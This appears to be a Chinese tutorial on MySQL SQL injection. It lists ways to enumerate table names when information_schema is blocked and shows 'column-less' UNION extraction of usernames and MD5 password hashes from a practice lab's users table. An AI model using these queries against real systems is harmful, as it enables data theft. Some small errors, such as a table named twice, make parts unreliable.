SQL注入限制条件下获取表名&无列名注入¶
获取表名¶
innodb存储引擎¶
Mysql>5.6.x
对于waf掉information_schema
,可以利用innodb_table_stats
和innodb_table_stats
两个表来查询到
但是mysql默认是关闭InnoDB存储引擎的
select table_name from mysql.innodb_table_stats where database_name = database();
select table_name from mysql.innodb_index_stats where database_name = database();
sys¶
在MySQL 5.7.9中sys中新增了一些视图,可以从中获取表名
//包含in
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` where object_schema = database();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
//不包含in
SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
//通过表文件的存储路径获取表名
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
无列名注入¶
利用join
进行无列名注入¶
select 1,2,3,4 union select * from users;
1 | 2 | 3 | 4 |
---|---|---|---|
1 | 2 | 3 | 4 |
1 | admin | e10adc3949ba59abbe56e057f20f883e | 1 |
2 | pikachu | 670b14728ad9902aecba32e22fa4f6bd | 2 |
3 | test | e99a18c428cb38d5f260853678922e03 | 3 |
select `3` from (select 1,2,3,4 union select * from users)a;
3 |
---|
3 |
e10adc3949ba59abbe56e057f20f883e |
670b14728ad9902aecba32e22fa4f6bd |
e99a18c428cb38d5f260853678922e03 |
如果```被过滤,使用别名来代替:
select b from (select 1,2 as b,3,4 as c union select * from users)a;
b |
---|
2 |
admin |
pikachu |
test |
同时查询多个列:
select concat(b,0x2d,c) from (select 1,2 as b,3 as c,4 union select * from users)a;
concat(b,0x2d,c) |
---|
2-3 |
admin-e10adc3949ba59abbe56e057f20f883e |
pikachu-670b14728ad9902aecba32e22fa4f6bd |
test-e99a18c428cb38d5f260853678922e03 |